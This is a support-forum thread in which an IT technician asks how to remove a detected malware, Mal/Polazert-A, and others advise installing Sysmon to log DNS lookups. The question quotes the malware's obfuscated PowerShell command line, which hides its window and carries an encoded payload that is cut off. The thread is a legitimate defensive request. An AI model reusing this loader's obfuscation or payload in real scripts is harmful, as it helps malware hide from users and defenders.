Thread Info
  • State Not Answered
  • Locked Locked
  • Replies 24 replies
  • Subscribers 16 subscribers
  • Views 8209 views
  • Users 0 members are here
Options
Suggested
This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

Mal/Polazert-A Removal?

MJ_P1

I have two endpoints at two totally unrelated clients where Sophos detected Mal/Polazert-A. Sophos is good at telling me about it, but it doesn't give me any options to remove it. Every time the client reboots their computer, they get a popup from Sophos after login that Sophos found this malware. Now I am concerned it is still running somehow and our client wants to know why we aren't removing malware from their computer.

I explain that Sophos detected and terminated it, but like me, they want to know why it is still there.

How do I remove it?

Details of the infection from Sophos Central:

Path:
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Name:
powershell.exe
Command line:
"PowerShell.exe" -EP byPAss -cOmMAnD "$a754ea6e8b041aa5b575492443c23=AdD-TypE -memBERDEfINITIon ('['+'d'.tOuppER()+'lL'.tolower()+'i'.Toupper()+'MpOrT('.toLOWeR()+[CHAr]0X22+'user32.DLl'.TOLoWer()+[CHar]0x22+')]PuBLIC sTATic extern BOol '.ToLOwEr()+'s'.tOupPEr()+'hOw'.ToLOWer()+'w'.TOupper()+'IndOw'.TOLoWeR()+'a'.TOupPEr()+'SYnc('.ToLower()+'i'.toUPper()+'nT'.tOLoweR()+'p'.tOUPper()+'Tr hwND, iNT NcmDSHow);'.toLOWER()) -naME ('W'.tOupPeR()+'iN32'.toLOweR()+'s'.TOUppEr()+'HoW'.TOLOwEr()+'w'.toUppeR()+'INDOW'.TOlOWeR()+'a'.tOUPPEr()+'SyNc'.TOlOWeR()) -nameSpacE WiN32FUNCTioNs -PAssThru;$a754ea6e8b041aa5b575492443c23::shoWWInDOWASYnc((gET-PROcess -id $Pid).mAiNWiNdOWHANdLE, 0);$a42b0d88df94e2b6b9453ae110cca='QHwmS1BAUnFIdEB3dChiQFZBPHJAVFEpel5uOzwzXk9+OGFeUTUrXkBSX0hGQHdKTXJeUjx6VEBWU0okQHFuJERAcW0pUUBSXyFvQHNfckxeTkYmTV5uJDZOQH04Tm9Ae1lIZV5NISlDXk07UiZeTyV5WkB7aFp4QHwmTmJeUnZDSUB1aVpLXlBHWl5AUzJCI15QckJiQH5NbyFAYHttJkB9aXVhXlBRZlVAUzQ0WEB0TTRuQHcxUFJeT3c3IV5ucm5pXlByVzhAeytXVEB2NWwwPCVeczB1I20wdGZ0I3g=';$a1bfc0
Process ID:
8456
Process executed by:
<domain>\Admin1
SHA256:
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
Start time:
Feb 9, 2022 7:51 PM
End time:
Feb 9, 2022 7:51 PM
Duration:
7s 69ms
Actions done to this artifact:
None
Actions performed by this artifact:
162 File reads
122 Registry value sets
19 File writes
9 File deletions
2 File renames
-Mike


This thread was automatically locked due to age.
  • 0 in reply to MJ_P1

    Hello,

    I suppose we can tackle it step by step.

    First thing would be to decide how to deploy it, if you're using Live Response as a test I would so as before with autoruns:

    1. Type:

    Powershell

    Enter, to start a PowerShell prompt.

    2. Make a temp directory for Sysmon in the root of the C drive, type the following as you're in a PowerShell prompt:

    New-Item -Path "c:\" -Name "Sysmon" -ItemType "directory"

    3. change to that new directory:

    CD \Sysmon

    4. Download Sysmon from Sysinternals.com to the same directory, by running:

    Invoke-WebRequest live.sysinternals.com/Sysmon.exe -UseBasicParsing -OutFile sysmon.exe

    5. Download the config file for logging DNS requests to the directory also. I've copied the above XML into a new Pastebin resource so it's publicly available:

    Invoke-WebRequest https://pastebin.com/raw/ve9M84wZ  -OutFile sysmon-config-dns.xml

    6. Install Sysmon by running:

    &"./sysmon.exe" /accepteula -i

    7. Configure it with the config.file downloaded to the same directory:

    &"./sysmon.exe" -c .\sysmon-config-dns.xml

    8. Optionally, run:
    Fltmc.exe 

    This will confirm the SymonDrv is running.

    At this point you should be able to start running the queries to use the Symon Event log.

    Hope it helps.

  • 0 in reply to Sophos User930

    To make it easier, you could just launch LiveReponse. Run PowerShell.exe to get a PS prompt and then paste:

    New-Item -Path "c:\" -Name "Sysmon" -ItemType "directory"
CD \Sysmon
Invoke-WebRequest live.sysinternals.com/Sysmon.exe -UseBasicParsing -OutFile sysmon.exe
Invoke-WebRequest https://pastebin.com/raw/ve9M84wZ  -OutFile sysmon-config-dns.xml
&"./sysmon.exe" /accepteula -i
&"./sysmon.exe" -c .\sysmon-config-dns.xml
Fltmc.exe

    This will carry out all the commands in one go.

  • 0 in reply to Sophos User930

    That all worked, thank you . I set it up on the DNS server (the 192.168.25.6 address).

    I waited for the threat to be detected, and it happened. That is the order, from bottom to top, of the three DNS forwarders in AD DNS.

    I ran the query, and nothing looks malicious:

    I can't figure out which of that is sending off requests to that malware URL. Does anything look suspicious to you?

    -Mike

  • 0 in reply to MJ_P1

    Hi Mike, nothing from that result set looks of concern but then I'm not sure how the times match up.  I don't really use the XG to give you better advice. I would create a new post in the XG section and maybe reference this page.  They must run into this scenario quite a lot.  I'm sure they would know what to recommend.

    Thanks.

Unfiltered HTML